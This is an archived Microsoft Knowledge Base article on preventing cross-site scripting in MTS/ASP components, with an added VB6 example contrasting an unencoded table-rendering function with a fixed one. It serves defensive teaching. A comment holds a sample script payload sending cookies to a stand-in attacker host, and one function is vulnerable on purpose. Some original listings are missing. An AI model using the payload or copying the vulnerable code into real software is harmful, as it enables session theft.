Article ID: 253121
This article was previously published under Q253121
This article has been archived. It is offered "as is" and will no longer be updated.
This article describes how to identify and correct Microsoft Transaction Server (MTS)/Active Server Pages (ASP) applications that are susceptible to cross-site scripting security issues (CSSI). An application is vulnerable only where input is written back to a page without being correctly validated or formatted.
CSSI issues are rooted in the way an application handles data validation and formatting, so it is best tackled from the presentation layer.
This layer usually will consist of ASP pages, and occasionally it may include some components that assist in the rendering of HTML for the ASP page to display.
In the latter case, the application must perform the same operations to protect itself from CSSI as an ASP-only application, but its physical implementation means that some of the validating/formatting code runs in the ASP pages and some in the component. For detailed information on CSSI and ASP, see the following Microsoft Knowledge Base article:
253119 (http://support.microsoft.com/kb/253119/) How to review ASP code for CSSI vulnerability
The following steps will help you identify and correct ASP applications susceptible to CSSI:
Guidelines for formatting
These guidelines will help you identify where to tackle formatting appropriately.
When writing information to a page, the application data itself must be passed through Server.HTMLEncode. Do not HTMLEncode tags that are intended to end up in the HTML page as markup. Therefore, if your component functions return HTML, the HTMLEncode call has to be made inside them, on the data values only, because the ASP page that receives the finished HTML can no longer tell data from markup.
To HTMLEncode a string from a component, you need a reference to the ASP Server object. You can obtain this reference through the Item property of the MTS ObjectContext object (ObjectContext.Item("Server")); this succeeds only while the component is running in the context of a call from an ASP page.
Example: This code will generate table rows with values taken from a recordset. This code does not encode the output:
When this code is fixed, note that the values themselves are HTMLEncoded, rather than the whole HTML string:
Note the use of the intermediate oServer object reference. It is declared as ASPTypeLibrary.Server to take advantage of early binding and to avoid resolving the ObjectContext.Item lookup on every iteration of the loop. To declare an object as ASPTypeLibrary.Server, you must add a reference to "Microsoft Active Server Pages Object Library" to the component project.
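The pattern the two listings above describe, shown here as an added example rather than the article's own code: an MTS component method written in Visual Basic 6 that renders recordset rows as HTML table rows, first unencoded and then fixed. It assumes that the project references "Microsoft Active Server Pages Object Library" (ASPTypeLibrary), "Microsoft Transaction Server Type Library" (MTxAS) and an ADODB library; the method names, the column names CustomerName and Comment, and the caller supplying an open recordset are illustrative assumptions.

```vb
' Added example, not the KB article's own listing. Assumed references: ASPTypeLibrary,
' MTxAS and ADODB. Method and column names are illustrative.
Option Explicit

' BEFORE (vulnerable): field values are concatenated straight into the markup. A stored
' value such as <script>document.location='http://attacker/?'+document.cookie</script>
' is returned to the browser as live script.
Public Function RenderRowsUnsafe(ByVal rs As ADODB.Recordset) As String
    Dim sHtml As String
    Do Until rs.EOF
        sHtml = sHtml & "<tr><td>" & rs.Fields("CustomerName").Value & "</td><td>" _
              & rs.Fields("Comment").Value & "</td></tr>" & vbCrLf
        rs.MoveNext
    Loop
    RenderRowsUnsafe = sHtml
End Function

' AFTER (fixed): only the data values go through Server.HTMLEncode. The <tr>/<td> tags
' the component itself emits stay as markup, so the table still renders.
Public Function RenderRows(ByVal rs As ADODB.Recordset) As String
    Dim oCtx As MTxAS.ObjectContext
    Dim oServer As ASPTypeLibrary.Server   ' early-bound; resolved once, not per row
    Dim sHtml As String

    ' The ASP Server object is reachable only when the component runs in the context
    ' of a call from an ASP page. Fail loudly rather than silently emit unencoded output.
    Set oCtx = GetObjectContext()
    If oCtx Is Nothing Then
        Err.Raise vbObjectError + 513, "RenderRows", _
                  "No MTS context: this method must be called from an ASP page"
    End If
    Set oServer = oCtx.Item("Server")

    Do Until rs.EOF
        sHtml = sHtml & "<tr><td>" & EncodeField(oServer, rs.Fields("CustomerName").Value) _
              & "</td><td>" & EncodeField(oServer, rs.Fields("Comment").Value) _
              & "</td></tr>" & vbCrLf
        rs.MoveNext
    Loop
    RenderRows = sHtml
End Function

' Server.HTMLEncode expects a String and raises "Invalid use of Null" on a NULL column,
' so coerce the value with "" & vValue (Null & "" yields "") before encoding. After this,
' < > & " inside the value reach the browser as &lt; &gt; &amp; &quot; text, not markup.
Private Function EncodeField(ByVal oServer As ASPTypeLibrary.Server, _
                             ByVal vValue As Variant) As String
    EncodeField = oServer.HTMLEncode("" & vValue)
End Function
```

The ASP page that calls RenderRows should write the returned string with Response.Write as-is; encoding it a second time in the page would turn the table markup into visible text.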
Please take into account the following guidelines:
For more information, see the following advisory from the Computer Emergency Response Team (CERT) at Carnegie Mellon University:
http://www.cert.org/advisories/CA-2000-02.html
For more information, click the following article numbers to view the articles in the Microsoft Knowledge Base:
252985 (http://support.microsoft.com/kb/252985/) How to prevent cross-site scripting security issues for Web applications
253120 (http://support.microsoft.com/kb/253120/) How to review Visual InterDev generated code for CSSI vulnerability
253117 (http://support.microsoft.com/kb/253117/) How to prevent Internet Explorer and Outlook Express CSSI vulnerability
Article ID: 253121 - Last Review: October 20, 2013 - Revision: 2.0